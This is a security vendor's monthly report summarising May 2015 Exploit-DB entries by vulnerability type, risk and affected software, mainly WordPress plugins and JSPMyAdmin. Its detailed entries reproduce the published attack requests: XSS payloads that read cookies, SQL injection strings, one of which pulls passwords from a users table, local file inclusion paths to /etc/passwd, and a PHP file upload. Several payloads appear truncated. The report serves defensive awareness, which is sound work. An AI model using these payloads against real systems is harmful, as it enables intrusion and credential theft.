Analysis summary (Prepared by: Penta Security Systems, Security Evaluation Team)

EDB Analysis Report (2015.05)
2015.05.01 ~ 2015.05.31
Information on the exploits published on Exploit-DB (http://exploit-db.com), classified by vulnerability type.

Analysis of the Exploit-DB entries published in May 2015 shows that XSS (Cross Site Scripting) attacks were reported most often. All of the analyzed XSS attacks were simple attacks that insert a script into a parameter; basic validation of input values and special characters would have been sufficient to block them.

Looking at the breakdown by software, as in April, the most vulnerabilities were reported in WordPress, the representative CMS. Because WordPress has a large user base and a wide range of plugins, it is a primary target for attackers, so administrators running WordPress must always keep it at the latest security-update level. The next largest number of vulnerabilities was reported in JSPMyAdmin. Although the vulnerabilities found were of low risk, JSPMyAdmin, the JSP version of PHPMyAdmin, also has many users, so regular security patching is needed to minimize the risk of attack.

1. Report count by vulnerability type

Vulnerability type | Reports
XSS                | 17
SQL Injection      | 15
LFI                | 3
File Upload        | 1
Total              | 36

(Chart: report count by vulnerability type)

2. Classification by risk level

Risk level | Reports | Percentage
High       | 4       | 11.11%
Medium     | 32      | 88.89%
Low        | 0       | 0.00%
Total      | 36      | 100.00%

(Chart: classification by risk level)

3. Breakdown by attack difficulty

Attack difficulty | Reports | Percentage
High              | 0       | 0.00%
Medium            | 3       | 8.33%
Low               | 33      | 91.67%
Total             | 36      | 100.00%

(Chart: breakdown by attack difficulty)

4. Breakdown by major software

Software name                         | Reports
WordPress                             | 20
JSPMyAdmin                            | 5
(product name not extracted) 3.6.5    | 2
SynTail                               | 1
SynaMan                               | 1
Syncrify                              | 1
Xeams                                 | 1
SQL Buddy                             | 1
Wing FTP Server Admin                 | 1
Pluck                                 | 1
PHPCollab                             | 1
Chronosite                            | 1
Total                                 | 36

(Chart: breakdown by major software)

** Details for major software with 5 or more reports

EDB No. | Type          | Difficulty | Risk   | Title                                                                                               | Software
36907   | XSS           | Low        | Medium | Ultimate Product Catalogue 3.1.2 - admin.php XSS                                                    | WordPress
36907   | File Upload   | Low        | High   | Ultimate Product Catalogue 3.1.2 - admin.php File Upload                                            | WordPress
36942   | SQL Injection | Low        | Medium | Freshmail Plugin <= 1.5.8 - post.php SQL Injection                                                  | WordPress
36930   | SQL Injection | Low        | Medium | Freshmail Unauthenticated - admin-ajax.php SQL Injection                                            | WordPress
36959   | XSS           | Low        | Medium | ClickBank Ads Plugin 1.7 - clickbank-ads.php XSS                                                    | WordPress
36958   | XSS           | Low        | Medium | Ultimate Profile Builder Plugin 2.3.3 - admin.php XSS                                               | WordPress
36954   | XSS           | Low        | Medium | Yet Another Related Posts Plugin <= 4.2.4 - options-general.php XSS                                 | WordPress
37003   | SQL Injection | Low        | Medium | Booking Calendar Contact Form 1.0.2 - /wp-path/wp-admin/ SQL Injection                              | WordPress
37003   | SQL Injection | Low        | Medium | Booking Calendar Contact Form 1.0.2 - admin-ajax.php SQL Injection                                  | WordPress
37003   | SQL Injection | Low        | Medium | Booking Calendar Contact Form 1.0.2 - /wp-path/ SQL Injection                                       | WordPress
37067   | SQL Injection | Medium     | High   | FeedWordPress Plugin 2015.0426 - admin.php SQL Injection                                            | WordPress
37080   | SQL Injection | Low        | Medium | WP Symposium Plugin 15.1 - / SQL Injection                                                          | WordPress
37131   | SQL Injection | Medium     | High   | WordPress Simple Photo Gallery 1.7.8 - /index.php/wppg_photogallery/wppg_photo_details/ SQL Injection | WordPress
37121   | XSS           | Low        | Medium | church_admin Plugin 0.800 - /wordpress/index.php/2015/05/2/church_admin-registration-form/ XSS      | WordPress
37109   | SQL Injection | Low        | Medium | GigPress Plugin 2.3.8 - gigpress.php SQL Injection                                                  | WordPress
37108   | SQL Injection | Low        | Medium | Landing Pages Plugin 1.8.4 - post.php SQL Injection                                                 | WordPress
37108   | XSS           | Low        | Medium | Landing Pages Plugin 1.8.4 - post-new.php XSS                                                       | WordPress
37107   | SQL Injection | Low        | Medium | NewStatPress Plugin 0.9.8 - admin.php SQL Injection                                                 | WordPress
37107   | XSS           | Low        | Medium | NewStatPress Plugin 0.9.8 - admin.php XSS                                                           | WordPress
37132   | XSS           | Low        | Medium | Plugin Free Counter 1.1 - admin-ajax.php XSS                                                        | WordPress
Detailed entries

Columns: Date | EDB No. | Type | Attack difficulty | Attack risk, followed by the title, the target program and environment, and the key attack code as published on Exploit-DB. Where a request line shows only a browser fragment, the original report recorded the User-Agent header of the request.

2015-05-04 | EDB 36907 | XSS | Difficulty: Low | Risk: Medium
Title: Ultimate Product Catalogue 3.1.2 - admin.php XSS
Target: WordPress / Ultimate Product Catalogue 3.1.2
Attack code:
  POST /wp-admin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=product&item_id=6 HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  action=edit_product&_wp_http_referer=/wp-admin/admin.php?page=upcpoptions&action=upcp_editproduct&update_item=product&item_id=6&item_name=product name</a><script>alert('product Name says: '+document.cookie)</script><a>&item_slug=asdf&item_id=6&Item_Image=http://i.imgur.com/6cWKujq.gif&Item_Price=666&item_description=product description says<script>alert('product description says: '+document.cookie)</script>&item_seo_description=seo desc&item_link=&item_display_status=show&category_iD=&SubCategory_ID=

2015-05-04 | EDB 36907 | File Upload | Difficulty: Low | Risk: High
Title: Ultimate Product Catalogue 3.1.2 - admin.php File Upload
Target: WordPress / Ultimate Product Catalogue 3.1.2
Attack code:
  POST /wp-admin/admin.php?page=upcpoptions&action=upcp_addproductspreadsheet&displaypage=product HTTP/1.1
  Connection: Close
  Accept: text/html, application/xhtml+xml, */*
  Accept-Language: ko-kr
  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
  Content-Type: multipart/form-data; boundary=---------------------------7dd0029908f2

  -----------------------------7dd0029908f2
  Content-Disposition: form-data; name="uploadfile"; filename="cooldog.php"
  Content-Type: application/octet-stream

  <? phpinfo();?>
  -----------------------------7dd0029908f2--

2015-05-07 | EDB 36942 | SQL Injection | Difficulty: Low | Risk: Medium
Title: Freshmail Plugin <= 1.5.8 - post.php SQL Injection
Target: WordPress / Freshmail Plugin <= 1.5.8
Attack code:
  POST /wp-admin/post.php HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  content=[fm_form id='" and substr(user(),,)="b]

2015-05-07 | EDB 36930 | SQL Injection | Difficulty: Low | Risk: Medium
Title: Freshmail Unauthenticated - admin-ajax.php SQL Injection
Target: WordPress / Freshmail <= 1.5.8
Attack code:
  POST wp-admin/admin-ajax.php HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  form%5bemail%5d=3dfake@fake.com&form%5bimie%5d=3Dasdf&fm_form_id=3D" and "a"=3d"a&action=3dfm_form&fm_form_referer=3d%2f

2015-05-08 | EDB 36959 | XSS | Difficulty: Low | Risk: Medium
Title: ClickBank Ads Plugin 1.7 - clickbank-ads.php XSS
Target: WordPress / ClickBank Ads Plugin 1.7
Attack code:
  POST /wp/wp-admin/options-general.php?page=clickbank-ads-clickbankwidget/clickbank-ads.php HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  cbwec[title]=">>><script>+-+--+-+alert(document.cookie)</script>

2015-05-08 | EDB 36958 | XSS | Difficulty: Low | Risk: Medium
Title: Ultimate Profile Builder Plugin 2.3.3 - admin.php XSS
Target: WordPress / Ultimate Profile Builder Plugin 2.3.3
Attack code:
  POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  field_name=<script>alert("")</script>

2015-05-08 | EDB 36954 | XSS | Difficulty: Low | Risk: Medium
Title: Yet Another Related Posts Plugin <= 4.2.4 - options-general.php XSS
Target: WordPress / Yet Another Related Posts Plugin <= 4.2.4
Attack code:
  POST /wp/wp-admin/admin.php?page=ultimatepb_field HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  no_results=<script>alert();</script>

2015-05-08 | EDB 36953 | XSS | Difficulty: Low | Risk: Medium
Title: SynTail <= 1.5 Build 566 - /app XSS
Target: SynTail / SynTail <= 1.5 Build 566
Attack code:
  POST /app HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  friendlyname=<script>alert("marlow")</script>

2015-05-08 | EDB 36951 | XSS | Difficulty: Low | Risk: Medium
Title: SynaMan <= 3.4 Build 436 - /app XSS
Target: SynaMan / SynaMan <= 3.4 Build 436
Attack code:
  /app?sharedname=%3cscript%3ealert%28%22xss%22%29%3C%2Fscript%3E&selectedPath=C%3A\&publicRead=&publicwrite=&operation=mngfolders&st=addfolder

2015-05-08 | EDB 36950 | XSS | Difficulty: Low | Risk: Medium
Title: Syncrify Server <= 3.6 Build 833 - /app XSS
Target: Syncrify / Syncrify Server <= 3.6 Build 833
Attack code:
  /app?adminemail=%3cscript%3ealert%28victim%29%3C%2Fscript%3E&smtpServer=127.0.0.1&smtpPort=25&smtpuser=%3cscript%3ealert%284%29%3c%2fscript%3E&smtpPassword=admin&smtpSecurity=None&proceedButton=save&operation=config&st=savesmtp

2015-05-08 | EDB 36949 | XSS | Difficulty: Low | Risk: Medium
Title: Xeams <= 4.5 Build 5755 - / XSS
Target: Xeams / Xeams <= 4.5 Build 5755
Attack code:
  /FrontController?domainname=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&operation=60

2015-05-11 | EDB 36993 | LFI | Difficulty: Low | Risk: Medium
Title: SQL Buddy 1.3.3 - /sqlbuddy/ LFI
Target: SQL Buddy / SQL Buddy 1.3.3
Attack code:
  /sqlbuddy/#page=../../../restricted/user_pwd.sql#

2015-05-11 | EDB 36992 | XSS | Difficulty: Low | Risk: Medium
Title: Wing FTP Server Admin <= 4.4.5 - /admin_loglist.html XSS
Target: Wing FTP Server Admin / Wing FTP Server Admin <= 4.4.5
Attack code:
  /admin_loglist.html?domain=<script>alert();</script>

2015-05-11 | EDB 36990 | LFI | Difficulty: Low | Risk: Medium
Title: (product name not extracted) 3.6.5 - view_file.php LFI
Target: (product name not extracted) 3.6.5
Attack code:
  /www/view_file.php?action=download&file=../../../../../../etc/passwd/

2015-05-11 | EDB 36989 | SQL Injection | Difficulty: Medium | Risk: High
Title: (product name not extracted) 3.6.5 - new_sidebar.php SQL Injection
Target: (product name not extracted) 3.6.5
Attack code:
  /www/new_sidebar.php?sbctg=lessons&new_lesson_id=null+union+select+password+from+users+where+id=

2015-05-11 | EDB 36986 | LFI | Difficulty: Low | Risk: Medium
Title: Pluck 4.7 - albums_getimage.php LFI
Target: Pluck / Pluck 4.7
Attack code:
  /pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini

2015-05-13 | EDB 37004 | SQL Injection | Difficulty: Low | Risk: Medium
Title: PHPCollab 2.5 - deletetopics.php SQL Injection
Target: PHPCollab / PHPCollab 2.5
Attack code:
  /phpcollab/topics/deletetopics.php?project=%27%20and%20%27a%27%3D%27a%27

2015-05-13 | EDB 37003 | SQL Injection | Difficulty: Low | Risk: Medium
Title: Booking Calendar Contact Form 1.0.2 - /wp-path/wp-admin/ SQL Injection
Target: WordPress / Booking Calendar Contact Form 1.0.2
Attack code:
  /wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=%20union%20select%20null,%20null

2015-05-13 | EDB 37003 | SQL Injection | Difficulty: Low | Risk: Medium
Title: Booking Calendar Contact Form 1.0.2 - admin-ajax.php SQL Injection
Target: WordPress / Booking Calendar Contact Form 1.0.2
Attack code:
  POST /wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  id='%20or%20sleep(00)#

2015-05-13 | EDB 37003 | SQL Injection | Difficulty: Low | Risk: Medium
Title: Booking Calendar Contact Form 1.0.2 - /wp-path/ SQL Injection
Target: WordPress / Booking Calendar Contact Form 1.0.2
Attack code:
  POST /wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  dex_item=%20union%20select%20null,%20null

2015-05-18 | EDB 37050 | SQL Injection | Difficulty: Low | Risk: Medium
Title: Chronosite 5.2 - archives.php SQL Injection
Target: Chronosite / Chronosite 5.2
Attack code:
  /cms/chronosite_52/archives.php?numero=%27%20and%20%27a%27%3D%27a%27

2015-05-20 | EDB 37067 | SQL Injection | Difficulty: Medium | Risk: High
Title: FeedWordPress Plugin 2015.0426 - admin.php SQL Injection
Target: WordPress / FeedWordPress Plugin 2015.0426
Attack code:
  /wp-admin/admin.php?page=feedwordpress/syndication.php&action=update Checked&link_ids[]=) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x76a6b6a7,0x707653577975544373,0x7787627)--

2015-05-21 | EDB 37080 | SQL Injection | Difficulty: Low | Risk: Medium
Title: WP Symposium Plugin 15.1 - / SQL Injection
Target: WordPress / WP Symposium Plugin 15.1
Attack code:
  /?page_id=4&cid=&show=%20and%20=

2015-05-26 | EDB 37131 | SQL Injection | Difficulty: Medium | Risk: High
Title: WordPress Simple Photo Gallery 1.7.8 - /index.php/wppg_photogallery/wppg_photo_details/ SQL Injection
Target: WordPress / Simple Photo Gallery 1.7.8
Attack code:
  /wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id= AND (SELECT * FROM (SELECT(SLEEP(5)))QBzh)&image_id=4

2015-05-26 | EDB 37121 | XSS | Difficulty: Low | Risk: Medium
Title: church_admin Plugin 0.800 - /wordpress/index.php/2015/05/2/church_admin-registration-form/ XSS
Target: WordPress / church_admin Plugin 0.800
Attack code:
  POST /wordpress/index.php/2015/05/2/church_admin-registration-form/ HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  save=yes&church_admin_register=9d8cf0420&_wp_http_referer=%2fwordpress%2findex.php%2f2015%2f05%2F2%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5b%5d=test&mobile%5b%5d=%2b3670&people_type_id%5b%5d=&email%5b%5d=test%40test.test&sex=male&phone=%2b3670&address=%3cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=5.503529583287&lng=-0.4893359375&recaptcha_challenge_field=03AHJ_VuvBRBOVts65lchUe_H_cAuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_NYQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gtjBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM0jnsseegthefo83fuzs9uuqrbqgqazgymmtwdgz4xvrzxudv5zc76ktq-lwkpa&recaptcha_response_field=34

2015-05-26 | EDB 37109 | SQL Injection | Difficulty: Low | Risk: Medium
Title: GigPress Plugin 2.3.8 - gigpress.php SQL Injection
Target: WordPress / GigPress Plugin 2.3.8
Attack code:
  POST /wp-admin/admin.php?page=gigpress/gigpress.php HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  _wpnonce=b3c92d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id= and =&show_venue_id=&show_related=new

2015-05-26 | EDB 37108 | SQL Injection | Difficulty: Low | Risk: Medium
Title: Landing Pages Plugin 1.8.4 - post.php SQL Injection
Target: WordPress / Landing Pages Plugin 1.8.4
Attack code:
  /wp-admin/post.php?post=306%20and%20=&action=edit&lp-variation-id=&ab-action=delete-variation

2015-05-26 | EDB 37108 | XSS | Difficulty: Low | Risk: Medium
Title: Landing Pages Plugin 1.8.4 - post-new.php XSS
Target: WordPress / Landing Pages Plugin 1.8.4
Attack code:
  /wp-admin/post-new.php?post_type=inboundforms&post='></iframe><script>alert(string.fromcharcode(88, 83, 83))</script>

2015-05-26 | EDB 37107 | SQL Injection | Difficulty: Low | Risk: Medium
Title: NewStatPress Plugin 0.9.8 - admin.php SQL Injection
Target: WordPress / NewStatPress Plugin 0.9.8
Attack code:
  /wp-admin/admin.php?where=agent%20and%20'a'='a'&limitquery=&searchsubmit=buscar&page=nsp_search

2015-05-26 | EDB 37107 | XSS | Difficulty: Low | Risk: Medium
Title: NewStatPress Plugin 0.9.8 - admin.php XSS
Target: WordPress / NewStatPress Plugin 0.9.8
Attack code:
  /wp-admin/admin.php?where=<script>alert(string.fromcharcode(88,+83,+83))</script>&searchsubmit=buscar&page=nsp_search

2015-05-27 | EDB 37132 | XSS | Difficulty: Low | Risk: Medium
Title: Plugin Free Counter 1.1 - admin-ajax.php XSS
Target: WordPress / Plugin Free Counter 1.1
Attack code:
  POST /wp-admin/admin-ajax.php HTTP/1.1
  (User-Agent: ... Chrome/16.0.912.75 Safari/535.7)
  action=check_stat&id_counter=<counter_id from step 2>&value_=<script>alert()</script>

2015-05-29 | EDB 37152 | SQL Injection | Difficulty: Low | Risk: Medium
Title: JSPMyAdmin 1.1 - deletedata.jsp SQL Injection
Target: JSPMyAdmin 1.1
Attack code:
  //deletedata.jsp?db=test&table=email&field= CATID or 'field'='name'

2015-05-29 | EDB 37152 | XSS | Difficulty: Low | Risk: Medium
Title: JSPMyAdmin 1.1 - right.jsp XSS
Target: JSPMyAdmin 1.1
Attack code:
  //right.jsp?server=localhost&db= "/><script>alert(666)</script>

2015-05-29 | EDB 37152 | XSS | Difficulty: Low | Risk: Medium
Title: JSPMyAdmin 1.1 - tabledata.jsp XSS
Target: JSPMyAdmin 1.1
Attack code:
  //tabledata.jsp?db= "/><script>alert(666);</script>

2015-05-29 | EDB 37152 | XSS | Difficulty: Low | Risk: Medium
Title: JSPMyAdmin 1.1 - query.jsp XSS
Target: JSPMyAdmin 1.1
Attack code:
  //query.jsp?server= "/><script>alert(666)</script>&db=

2015-05-29 | EDB 37152 | XSS | Difficulty: Low | Risk: Medium
Title: JSPMyAdmin 1.1 - export.jsp XSS
Target: JSPMyAdmin 1.1
Attack code:
  //export.jsp?db=test&table= <script>alert(666)</script>